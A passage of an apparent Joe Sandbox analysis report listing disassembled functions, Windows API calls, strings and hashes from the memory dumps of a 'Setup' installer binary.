                                                                • Part of subcall function 6C915485: GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,6C917DAF,?,?,?,?,?,00000000,?,?,6C90AB18,00000008,6C917CD9), ref: 6C91549C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$HandleModule
                                                              • String ID: Unknown
                                                              • API String ID: 1530205010-1654365787
                                                              • Opcode ID: bc629b201ba6b08d74ab3b108e0cb2cf9cd13475b34dd48e5723f36307aa6cf8
                                                              • Instruction ID: 8f00896ed8344802a4d6723446288cdffc130aeb2633ef55ecee48e39660d190
                                                              • Opcode Fuzzy Hash: bc629b201ba6b08d74ab3b108e0cb2cf9cd13475b34dd48e5723f36307aa6cf8
                                                              • Instruction Fuzzy Hash: 59313F715107059AE728DFB4C842BEBB3A8BF25314F504E1EA179DBBC0DB70E9488755
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C922818
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C921EBF: __EH_prolog3.LIBCMT ref: 6C921EC6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_malloc
                                                              • String ID: BlockIfGroup
                                                              • API String ID: 1683881009-1356723647
                                                              • Opcode ID: 2c19ef3e05af0475ab43404b083dcbbd7ca51e5cb5dbd838a6fecd97c5079d43
                                                              • Instruction ID: 9c1cfa7296238928b668d48cde1e96e3581aab02544a41bd5b5ad1116e9c1e0b
                                                              • Opcode Fuzzy Hash: 2c19ef3e05af0475ab43404b083dcbbd7ca51e5cb5dbd838a6fecd97c5079d43
                                                              • Instruction Fuzzy Hash: EA31947092060AEBDF04DFF9C948BDE77B8AF25318F1044A5E554EB685D734CA04CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: %TEMP%
                                                              • API String ID: 431132790-235365282
                                                              • Opcode ID: bdabb19927a1e5adc26456249c4df50dc67fd70db28e3edcc23e0d28f0b71a38
                                                              • Instruction ID: f0c4adeff2d48fe59bf892a6b3dc7c7e2aae61e4bbb0f78b97deef47f686ee22
                                                              • Opcode Fuzzy Hash: bdabb19927a1e5adc26456249c4df50dc67fd70db28e3edcc23e0d28f0b71a38
                                                              • Instruction Fuzzy Hash: AC216D71A01159ABDF00DFA4CC88CEEBB75FF14315B004529F925AB698DB30DA16CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C944ADD
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$AppendPath_memcpy_s
                                                              • String ID: %TEMP%
                                                              • API String ID: 3727483831-235365282
                                                              • Opcode ID: 59e8683ff589aa0633a3c164056b4e0608a411bc3d065e4eb48e48e6254c61f5
                                                              • Instruction ID: 6e24e177da9ac5b82e138b9c4f16d98d45eab54ddeb25a797b6d0f9de29223b7
                                                              • Opcode Fuzzy Hash: 59e8683ff589aa0633a3c164056b4e0608a411bc3d065e4eb48e48e6254c61f5
                                                              • Instruction Fuzzy Hash: 10214F3290010A9BDF14DBB8C8417EEB7B4AF31328F144656E160EBBD5DB74DA188B95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92267E
                                                                • Part of subcall function 6C9189B7: __EH_prolog3.LIBCMT ref: 6C9189BE
                                                                • Part of subcall function 6C9189B7: __CxxThrowException@8.LIBCMT ref: 6C918A89
                                                                • Part of subcall function 6C922811: __EH_prolog3.LIBCMT ref: 6C922818
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: ReturnCode
                                                              • API String ID: 2489616738-1214168914
                                                              • Opcode ID: d5e7325b59380783f2b11ec7421cc56b6255cb47f63af28d8e1048a972366205
                                                              • Instruction ID: a92c8f666e41b1c3f843feb7d3e4089ed7c513f8b526e68a47fe3379e0a81112
                                                              • Opcode Fuzzy Hash: d5e7325b59380783f2b11ec7421cc56b6255cb47f63af28d8e1048a972366205
                                                              • Instruction Fuzzy Hash: CB21A1B0A11314DFCB04CF6CC881A9E7BA8BF29714B14855AF424DFB85C770D914CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: %TEMP%
                                                              • API String ID: 431132790-235365282
                                                              • Opcode ID: 85fb70ad098afdecc617a2f4e776c1d46fd6b2a4121ffe559055ec46c1aed7a8
                                                              • Instruction ID: c2290c166b2f1be17775ea3234c44aab269bd96a3fae788f1ff056a768fee661
                                                              • Opcode Fuzzy Hash: 85fb70ad098afdecc617a2f4e776c1d46fd6b2a4121ffe559055ec46c1aed7a8
                                                              • Instruction Fuzzy Hash: F2215171A1021AAFDF04DFA0CC88AEE7775FF24319F404524F915AAA90CB70DA15CBB4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCommandLineW.KERNEL32(512AC3CC,6C94831D,?,00000000,6C984C14,000000FF,?,6C947793,?,00000000), ref: 6C9592BF
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandLine
                                                              • String ID: repair
                                                              • API String ID: 1384747822-2397320225
                                                              • Opcode ID: 6d9c4c50acd8f7e40fb9a2bc4d91c422115672e86cea3f0d100fbbf68c83a54a
                                                              • Instruction ID: 3d18e5173f2c08759ddaf55780021976cb7bdce09a750cf4428a0d4b7cad4c3e
                                                              • Opcode Fuzzy Hash: 6d9c4c50acd8f7e40fb9a2bc4d91c422115672e86cea3f0d100fbbf68c83a54a
                                                              • Instruction Fuzzy Hash: 1811E67254C344ABD700CB64CC45F9A73ECEB6A738F140A1AB96193ED0DB30D504CA82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetWindowPlacement.USER32(?,?), ref: 6C48FF6A
                                                                • Part of subcall function 6C4A76EE: _calloc.LIBCMT ref: 6C4A770F
                                                                • Part of subcall function 6C4A83ED: __CxxThrowException@8.LIBCMT ref: 6C4A83E2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8PlacementThrowWindow_calloc
                                                              • String ID: ,
                                                              • API String ID: 1982324250-3772416878
                                                              • Opcode ID: db830226f0c87db632e4170c75ba93d180f63fbe664b5d99d6d8e865c69418ec
                                                              • Instruction ID: 5df8e379d890cafeec70b05651ae04e9ba5a35e8f0cc30bfc239ccc079b423be
                                                              • Opcode Fuzzy Hash: db830226f0c87db632e4170c75ba93d180f63fbe664b5d99d6d8e865c69418ec
                                                              • Instruction Fuzzy Hash: 051148B6A02208AFDB00DFA9D880D9EF7F5FF49314B21442AE959A3700D730F945CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C934689
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: #(loc.
                                                              • API String ID: 431132790-1630946291
                                                              • Opcode ID: 64b37f27948ef502c9baf50de3baf69b5a39ef8138ac5ebdd2a02b077009f120
                                                              • Instruction ID: 7c3c7dc4a123df63bf738ce9c1f911796b745422042fbafc83eb23aa02680462
                                                              • Opcode Fuzzy Hash: 64b37f27948ef502c9baf50de3baf69b5a39ef8138ac5ebdd2a02b077009f120
                                                              • Instruction Fuzzy Hash: 4F11F775901209DFDF10CFA8C945AEDB7B4BF25328F008656F820ABB80D774DA198BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9297D5
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: RetryHelper
                                                              • API String ID: 431132790-1997034708
                                                              • Opcode ID: 5cb0bd99b4080e8cf06718264d0c365b590420b7c9cc857234d0c175a78201af
                                                              • Instruction ID: cf6ad03f416bb4bd3e7f5494a92de25080886b942760d13e09bb678c4cb3c190
                                                              • Opcode Fuzzy Hash: 5cb0bd99b4080e8cf06718264d0c365b590420b7c9cc857234d0c175a78201af
                                                              • Instruction Fuzzy Hash: 35F01DB1A01305DFCB20DFA4C901ADEB7E4BF24354B008819E469DBF40D730D914CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Entering Function
                                                              • API String ID: 431132790-2002471330
                                                              • Opcode ID: 817d33a42d9359fd69b4bc58be2c2f52e454ae9c7b9011337aef8622b75a1cbf
                                                              • Instruction ID: 3a3012f850e23250eb0fe1d4354448f6322a46be9eb610ee5a15c27b3eb3110e
                                                              • Opcode Fuzzy Hash: 817d33a42d9359fd69b4bc58be2c2f52e454ae9c7b9011337aef8622b75a1cbf
                                                              • Instruction Fuzzy Hash: FBF032356002019FDB20DF68C940B9DB7E0EF64714F00C80AE895CBB50CB34E860CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              • exiting function/method, xrefs: 6C9138EF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: exiting function/method
                                                              • API String ID: 431132790-2452647166
                                                              • Opcode ID: 537d03246afba34fac978da8bdfad4cb7be63d267e24ce4941db782ea64c767e
                                                              • Instruction ID: 428ee540f7fa789f9764d51bdead9934710a90ebeddfed99f9872996e7525383
                                                              • Opcode Fuzzy Hash: 537d03246afba34fac978da8bdfad4cb7be63d267e24ce4941db782ea64c767e
                                                              • Instruction Fuzzy Hash: 00E0E5352016019FD720DFA8C158B49B7A1FF68315F108498E6559FBA0CB31E824CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C914419
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C913C8F: __EH_prolog3.LIBCMT ref: 6C913C96
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: ParameterFolder
                                                              • API String ID: 431132790-2570462325
                                                              • Opcode ID: 1ad1c27369fe1d6fd1d5b93b0fdb9861489f62853edf967c3180d73173622f7b
                                                              • Instruction ID: dab4ba8cff2e619adc99eabcbde083424bd6cc075d6e0eb15a4e11bbc0e6d627
                                                              • Opcode Fuzzy Hash: 1ad1c27369fe1d6fd1d5b93b0fdb9861489f62853edf967c3180d73173622f7b
                                                              • Instruction Fuzzy Hash: 03E01271901109ABDF14EBA4CC00BED7371BF30319F108A04E520AAF80C730D928D764
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(RICHED20.DLL,?,6C49CA98,00000000,00000001,?,80070057,6C485D9C,?,00000030,80070057), ref: 6C4909C9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: RICHED20.DLL
                                                              • API String ID: 1029625771-992299850
                                                              • Opcode ID: 5a114f949e221eb9b61d98907152091a6ff1842653ee5a7badb9a1cf200d5c39
                                                              • Instruction ID: 16aeff441ed4c9e285212dda87f8e3c80d2d5676e166ea9ce362c4b35bcb92d5
                                                              • Opcode Fuzzy Hash: 5a114f949e221eb9b61d98907152091a6ff1842653ee5a7badb9a1cf200d5c39
                                                              • Instruction Fuzzy Hash: F1E0FEB1A02B408F8760DF6B9944942FBF8BFAA6103104A1FE09AC2A24D7B0E1458F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ctype.LIBCPMT ref: 6C632015
                                                              • ctype.LIBCPMT ref: 6C63202A
                                                                • Part of subcall function 6C6217EB: malloc.MSVCRT ref: 6C6217F6
                                                                • Part of subcall function 6C622885: InitializeCriticalSectionAndSpinCount.KERNEL32(00000004,00000FA0,?,00000000,00000000), ref: 6C6228C4
                                                                • Part of subcall function 6C623992: EnterCriticalSection.KERNEL32(?,00000000,6C62397F,00000000,6C62371E,80004005), ref: 6C6239AE
                                                                • Part of subcall function 6C622C9B: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,6C6227B0,00000000,6C640088), ref: 6C622D01
                                                                • Part of subcall function 6C622C9B: VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,6C6227B0,00000000,6C640088), ref: 6C622D4F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalSectionVirtualctype$CountEnterInitializeSpinmalloc
                                                              • String ID:
                                                              • API String ID: 738331480-0
                                                              • Opcode ID: 76671d91761310ff62cd2a78544bd6e9be0a305812316b439c8fd83eea35ed7e
                                                              • Instruction ID: b6923bc0ed04d0e59047fd9a54eecf0a423b921be69d9d4e9a1a38604356d984
                                                              • Opcode Fuzzy Hash: 76671d91761310ff62cd2a78544bd6e9be0a305812316b439c8fd83eea35ed7e
                                                              • Instruction Fuzzy Hash: 4971D231254290AFDB209F11CC84F9A3BE5BB0275CF20A86CE9599BEA1C779D449CF5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C913C96
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                              • _wcspbrk.LIBCMT ref: 6C913DF7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_wcspbrk
                                                              • String ID:
                                                              • API String ID: 1958752295-0
                                                              • Opcode ID: e7ed8cb27c5e03e75513f1b89c116641b68f377ce1ba899da58c7e5b506aa0fa
                                                              • Instruction ID: a0537cb968d6c8e3f41e4606ff5264375bfcc3750ca53127020b8d1d52111086
                                                              • Opcode Fuzzy Hash: e7ed8cb27c5e03e75513f1b89c116641b68f377ce1ba899da58c7e5b506aa0fa
                                                              • Instruction Fuzzy Hash: 49410831600109ABCB15EFB9C8809ED77A5AF7431CF14C616E920DFF81D730DA098795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C96847A: RegCloseKey.ADVAPI32(?,?,?,6C92463B,00000034,00000034,00000000), ref: 6C9684BA
                                                              • RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C9242F8,6C90A794,02642228), ref: 6C92468D
                                                              • RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C9242F8,6C90A794,02642228), ref: 6C92469E
                                                                • Part of subcall function 6C9683D2: RegQueryValueExW.ADVAPI32(00000000,00000034,00000000,00000034,00000034,00000000,?,?,6C924685,?,?,6C9242F8,00000034,00000034,00000034,00000034), ref: 6C9683F4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Close$QueryValue
                                                              • String ID:
                                                              • API String ID: 2393043351-0
                                                              • Opcode ID: f0602786051a395f71f58a076afc52b689380acf7db285c80d96bd8bdda3cfd2
                                                              • Instruction ID: 8c72fdbec877a5f06d05a8e1864f615978f05c3172f5d18bf21dcd18043d9a2d
                                                              • Opcode Fuzzy Hash: f0602786051a395f71f58a076afc52b689380acf7db285c80d96bd8bdda3cfd2
